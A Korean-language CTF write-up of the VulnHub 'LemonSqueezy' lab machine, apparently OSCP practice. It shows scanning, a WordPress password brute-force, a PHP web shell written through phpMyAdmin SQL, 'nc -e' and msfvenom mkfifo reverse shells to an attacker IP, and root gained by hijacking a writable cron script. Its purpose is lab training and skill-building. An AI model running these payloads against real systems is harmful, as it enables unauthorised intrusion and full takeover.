INFO

Name : LemonSqueezy

Entry : 26 / 35

Level : Beginner

VulnHub URL : https://www.vulnhub.com/entry/infosec-prep-oscp,508/

GOAL

As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.

SETUP

I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network(sometimes Bridged). I used Workstation this time.

DESCRIPTON

This is a beginner boot2root in a similar style to ones I personally enjoy like Mr Robot, Lazysysadmin and MERCY.

This is a VMware machine. DHCP is enabled, add lemonsqueezy to your hosts. It’s easypeasy!

 

 

​TABLE OF CONTENTS

1. DISCOVERY

2. SCANNING

3. EXPLOITATION

4. POST EXPLOITATION & PRIVILEGE ESCALATION

 

1. DISCOVERY

 

 

 

2. SCANNING

 

┌──(root💀takudaddy)-[~]
└─# nmap -A -p- 192.168.20.15                                                                              130 ⨯ 2 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 00:48 KST
Nmap scan report for 192.168.20.15
Host is up (0.00036s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works

 

 

 

 

web enumeration

+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found


/icons/               (Status: 403) [Size: 278]
/manual/              (Status: 200) [Size: 626]
/javascript/          (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10701]
/wordpress/           (Status: 200) [Size: 52276]
/phpmyadmin/          (Status: 200) [Size: 10637]
/server-status/       (Status: 403) [Size: 278]

서버가 phpmyadmin과 wordpress 페이지를 호스팅 하고 있다.

 

 

 

wordpress

 

 

 

 

페이지가 정상적으로 출력 되지 않고

링크들 접속이 전혀 되지 않는다.

 

 

이런 경우 늘 서버 문제인줄로 알았고

그때마다 짜증내기 일수였는데 알고 보니

hosts 파일에 등록이 되어 있지 않기 때문에

일어나는 현상!

 

 

반성합니다 과거의 무지했던 나~

죄송합니다 서버를 제공해주신

위대한 개발자님들(_ _)

 

 

해결해 보자!

 

 

/etc/hosts 파일에

IP와 네임서버를 등록해 주고

메모리에 올려놓기 위해

네트워크를 재기동 시켜준 뒤

 

 

 

┌──(root💀takudaddy)-[/study]
└─# cat /etc/hosts
127.0.0.1       localhosts
127.0.1.1       takudaddy.example.com   takudaddy
192.168.20.15   lemonsqueezy

 

 

 

페이지를 다시 열어보면~

 

 

쾌적~~~

 

 

 

wpscan

┌──(root💀takudaddy)-[/study]
└─# wpscan --url http://lemonsqueezy/wordpress -e at -e ap -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://lemonsqueezy/wordpress/ [192.168.20.15]
[+] Started: Sat Apr 10 01:23:58 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://lemonsqueezy/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://lemonsqueezy/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://lemonsqueezy/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://lemonsqueezy/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://lemonsqueezy/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
 |  - http://lemonsqueezy/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-03-09T00:00:00.000Z
 | Readme: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <========================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] lemon
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://lemonsqueezy/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Apr 10 01:23:59 2021
[+] Requests Done: 14
[+] Cached Requests: 50
[+] Data Sent: 3.938 KB
[+] Data Received: 11.633 KB
[+] Memory used: 166.551 MB
[+] Elapsed time: 00:00:01

 

user : lemon / orange

 

 

 

password brute force attack

┌──(root💀takudaddy)-[/study]
└─# wpscan --url http://lemonsqueezy/wordpress --usernames lemon,orange -P /usr/share/wordlists/rockyou.txt       2 ⨯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://lemonsqueezy/wordpress/ [192.168.20.15]
[+] Started: Sat Apr 10 01:50:55 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://lemonsqueezy/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://lemonsqueezy/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://lemonsqueezy/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://lemonsqueezy/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://lemonsqueezy/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
 |  - http://lemonsqueezy/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-03-09T00:00:00.000Z
 | Readme: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=========================================> (22 / 22) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - orange / ginger

 

orange : ginger

 

 

 

 

 

3. EXPLOITATION

 

 

 

 

 

 

n0t1n@w0rdl1st!

 

 

 

 

 

 

phpmyadmin

 

orange : n0t1n@w0rdl1st!

 

 

lemon :

$P$ByDvlux0J/6CvT2nU20bxqp/5mDxc00

 

 

 

 

create new table

 

 

 

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"

 

 

 

 

 

리스너 기동 후

cmd = nc -e /bin/bash 192.168.20.1 7979

 

 

 

┌──(root💀takudaddy)-[/study]
└─# nc -lvp 7979          
listening on [any] 7979 ...
connect to [192.168.20.1] from lemonsqueezy [192.168.20.15] 58512
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@lemonsqueezy:/var/www/html/wordpress$

 

 

침투 성공

 

 

 

 

 

 

4. POST EXPLOITATION & PRIVILEGE ESCALATION

 

www-data@lemonsqueezy:/opt$ find / -perm -g=s -type f -exec ls -l {} \; 2>/dev/null
< / -perm -g=s -type f -exec ls -l {} \; 2>/dev/null
-rwxr-sr-x 1 root shadow 35592 May 28  2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root tty 14768 Apr 12  2017 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 19008 Jan 17  2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 22808 Mar 17 18:57 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71856 Mar 17 18:57 /usr/bin/chage
-rwxr-sr-x 1 root crontab 40264 Oct  7  2017 /usr/bin/crontab
-rwxr-sr-x 1 root tty 27448 Mar  8  2018 /usr/bin/wall
-rwxr-sr-x 1 root ssh 358624 Jul 15  2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root utmp 10232 Feb 19  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root mail 14336 Aug  3  2020 /usr/lib/evolution/camel-lock-helper-1.2
-rwsr-sr-x 1 root root 10576 Dec  2 21:01 /usr/lib/xorg/Xorg.wrap
www-data@lemonsqueezy:/opt$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    /etc/logrotate.d/logrotate
#
www-data@lemonsqueezy:/opt$

www-data@lemonsqueezy:/opt$ ls -l /etc/logrotate.d/logrotate
ls -l /etc/logrotate.d/logrotate
-rwxrwxrwx 1 root root 101 Apr 26  2020 /etc/logrotate.d/logrotate
www-data@lemonsqueezy:/opt$ cat /etc/logrotate.d/logrotate
cat /etc/logrotate.d/logrotate
#!/usr/bin/env python
import os
import sys
try:
   os.system('rm -r /tmp/* ')
except:
    sys.exit()
www-data@lemonsqueezy:/opt$

 

 

/etc/logrotate.d/logrotate 파일이

루트 권한으로 2분마다 실행되고

수정 권한도 있다.

 

 

fifo를 사용한다.

paylaod를 생성해주면

침투서버에 입력해야 할 명령어가 나오고

┌──(root💀takudaddy)-[/attack]
└─# msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.20.1 LPORT=7777                                      130 ⨯ 2 ⚙
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 98 bytes
mkfifo /tmp/xradgd; nc 192.168.20.1 7777 0</tmp/xradgd | /bin/sh >/tmp/xradgd 2>&1; rm /tmp/xradgd

 

 

이를 침투서버의

logrotate 파일 내용으로 바꿔준뒤

www-data@lemonsqueezy:/etc/logrotate.d$ echo "mkfifo /tmp/xradgd; nc 192.168.20.1 7777 0</tmp/xradgd | /bin/sh >/tmp/xradgd 2>&1; rm /tmp/xradgd
</xradgd | /bin/sh >/tmp/xradgd 2>&1; rm /tmp/xradgd
>" > logrotate

www-data@lemonsqueezy:/etc/logrotate.d$ cat logrotate
cat logrotate
mkfifo /tmp/xradgd; nc 192.168.20.1 7777 0</tmp/xradgd | /bin/sh >/tmp/xradgd 2>&1; rm /tmp/xradgd

 

 

 

리스너를 기동하고 대기하고 있으면

┌──(root💀takudaddy)-[/attack]
└─# nc -lvp 7777                                                                                                 2 ⚙
listening on [any] 7777 ...
connect to [192.168.20.1] from lemonsqueezy [192.168.20.15] 38766
id
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
root@lemonsqueezy:~# cd /root
cd /root
root@lemonsqueezy:~# ls
ls
root.txt
root@lemonsqueezy:~# cat root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=
root@lemonsqueezy:~#

 

 

728x90
저작자표시

'OSCP > Vulnahub' 카테고리의 다른 글

28. Lord of the Root  (0) 2021.04.12
27. Pinky's Palace (BOF)* 중요!~  (0) 2021.04.11
25. Infosec Prep  (0) 2021.04.09
24. GoldenEye  (0) 2021.04.09
23. W34kn3ss  (0) 2021.04.09

+ Recent posts

티스토리툴바